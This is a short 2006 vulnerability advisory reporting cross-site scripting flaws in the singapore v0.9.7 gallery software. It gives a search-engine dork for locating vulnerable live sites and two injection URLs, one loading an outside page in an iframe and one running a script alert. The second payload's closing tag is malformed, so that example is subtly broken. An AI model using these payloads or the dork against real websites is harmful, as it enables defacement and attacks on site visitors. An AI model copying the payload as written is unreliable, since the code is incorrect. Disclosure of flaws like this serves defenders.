singapore v0.9.7 XSS Vulnerabilities

2006-05-09T00:00:00
ID SECURITYVULNS:DOC:12590
Type securityvulns
Reporter Securityvulns
Modified 2006-05-09T00:00:00

Description

SOFTWARE:

singapore v0.9.7

DESCRIPTION:

The system is vulnerable to various XSS attacks

google dork : "Powered by singapore v0.9.7" inurl:index.php?gallery 429 results :)

xss code example

www.site.com/images/index.php?gallery=[gallery name]&image=<iframe%20src="http://www.yoursite.com">

www.site.com/images/index.php?gallery=[gallery name]&image=<script>alert("lol")<script>

mail: alp_eren[at]ayyildiz[dot]com web : http://www.ayyildiz.org

greets to thehacker,iskorpitx,suskun,shadow, and all AYT member